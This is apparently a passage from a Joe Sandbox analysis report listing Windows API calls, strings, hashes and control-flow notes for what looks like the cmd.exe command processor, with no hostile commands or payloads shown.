• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 402963468-0

Control-flow Graph
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0003CA98,0000000C), ref: 00026940
                                                                                                                                                                                                                                                                                                                                                                                                                          • _amsg_exit.MSVCRT ref: 00026955
                                                                                                                                                                                                                                                                                                                                                                                                                          • _initterm.MSVCRT ref: 000269A9
                                                                                                                                                                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 000269D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.MSVCRT ref: 00026A1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • _XcptFilter.MSVCRT ref: 00026A2E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 796493780-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5418af9fc1829e67b5a3686acc48f9e4c6ede31d68c305c28d4baf2f42ff8623
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e91fba292fb89d4ad2f2b2739665619c5765fb8cf7c761859defe017dd4171c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5418af9fc1829e67b5a3686acc48f9e4c6ede31d68c305c28d4baf2f42ff8623
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B311431604761CFFB229B54FC457A937A8EB04724F200629E206972E1DF3A5880CB81

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetThreadUILanguage.KERNELBASE ref: 0001E2C6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,0001B952), ref: 0001E2D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(75550000,SetThreadUILanguage,00000000,0001B952), ref: 0001E2F9
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,0001B952), ref: 0002DC08
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1264603166-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4323f726641b487b63970cc9ba236342f5891714523673838f00adc5b64273b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 51ee1135fde4448e9bccbb00e7821aa30d8f47094f131f0e4d8fcfaa705c68a4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4323f726641b487b63970cc9ba236342f5891714523673838f00adc5b64273b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFF09071A046608BEB515B24FE4C6DE3694E706B32B150301FD15E72E0D7789CC1CA99

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,00000104,25170B64,00000001,?), ref: 0001ADB6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00025A2E: memset.MSVCRT ref: 00025A5A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 0001B0E3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: memset.MSVCRT ref: 0001E9A0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001E9FC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001EA14
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: _wcsicmp.MSVCRT ref: 0001EA80
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001AED2
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 0001B016
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 0002CC6C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0002CCCB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4198873954-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3dff6d51f4febcbc35b0916dcf7405fb29be9fb1a899ff103b128774ddc62d03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: abcd53c95ce041fe25ea9751c688d8bdb41001ba52cb14cc66958ca5d52d6835
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dff6d51f4febcbc35b0916dcf7405fb29be9fb1a899ff103b128774ddc62d03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EB13571B002258BDB74AB68DC95BFE73E0AF45300F140179E90A97292EB349DC6CB96

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 861 21f1a-21f33 GetConsoleOutputCP GetCPInfo 862 2f185-2f194 GetThreadLocale 861->862 863 21f39-21f54 memset 861->863 866 2f196-2f1a0 862->866 867 2f1ae-2f1b2 862->867 864 2f1d7-2f1d8 863->864 865 21f5a 863->865 868 2f1dd-2f1e2 864->868 866->867 869 2f1b4-2f1b8 867->869 870 2f1c8 867->870 871 2f1e4-2f1ec 868->871 872 2f20b-2f20c 868->872 869->870 873 2f1ba 869->873 870->864 874 2f203-2f209 871->874 875 2f1ee-2f200 memset 871->875 873->870 874->868 874->872 875->874
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(00020A41), ref: 00021F1A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 00021F2B
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00021F45
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0002F185
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002F1FB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1263632223-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fc7f53c72406f2665155f2e89e8cd509c5e261b01271f0e88dac702e7ad54b14
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a57d0862e7564244867be756561ccbbe1fb7c581457a855a143544de01267d2d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc7f53c72406f2665155f2e89e8cd509c5e261b01271f0e88dac702e7ad54b14
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A1159F5909363A9F7B04F10FD0AFB626E4A712340F84023EED96A5191D76C4881831E

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 876 1a9d4-1a9e4 GetEnvironmentStringsW 877 1a9e6-1aa04 call 1aa20 GetProcessHeap RtlAllocateHeap 876->877 878 1aa19-1aa1d 876->878 881 1aa11-1aa18 FreeEnvironmentStringsW 877->881 882 1aa06-1aa0e memcpy 877->882 881->878 882->881
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0001A9C5), ref: 0001A9D8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0001A9F3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0001A9FA
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0001AA09
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0001AA12
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
• String ID:
• API String ID: 429350006-0

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
APIs
• memset.MSVCRT ref: 0001E455
• ??_V@YAXPAX@Z.MSVCRT(?,00015F21,-00000001), ref: 0002DC6C
Strings
• onecore\base\cmd\maxpathawarestring.cpp, xrefs: 0002DC57
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: memset
• String ID: onecore\base\cmd\maxpathawarestring.cpp
• API String ID: 2221118986-3416068913
APIs
• _callnewh.MSVCRT ref: 00027437
  • Part of subcall function 000274D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(000277EC,00000001), ref: 000274E7
• malloc.MSVCRT ref: 00027444
• _CxxThrowException.MSVCRT(?,0003CBF8), ref: 000277F5
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: ??0exception@@ExceptionThrow_callnewhmalloc
• String ID:
• API String ID: 813871643-0
APIs
• memset.MSVCRT ref: 00015EFB
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
  • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
  • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
  • Part of subcall function 00020060: wcschr.MSVCRT ref: 0002006C
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00015FF7
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4234405029-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-1631433037
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00026E37
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002742D: malloc.MSVCRT ref: 00027444
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 125873668-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 000341B9
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000341CA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00034205
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0003426C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00039E02,?,00000010), ref: 00034283
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 00034292
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000342B1
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000342C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 000342D2
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000342D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0003432F
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00034336
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 000343DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 000343F0
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00034405
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0003441A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0003442F
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00034444
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00034459
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 000344A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 000344F0
                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00034506
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 0003451D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00034565
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 0003456C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00034595
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0003459C
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000345C3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00039E02,?,00000000), ref: 000345D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000345DD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2991647268-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-1980097535
APIs
• GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0003E590,?,00002000), ref: 00016896
• SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000168AA
• FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 000168BE
• FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000168D2
• realloc.MSVCRT ref: 0002A5E7
  • Part of subcall function 00018791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00016906,0000001F,?,00000080), ref: 00018791
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00016907
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0001698F
• memmove.MSVCRT(?,?,?), ref: 00016A86
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00016AAF
• realloc.MSVCRT ref: 00016ACA
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00016AFE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
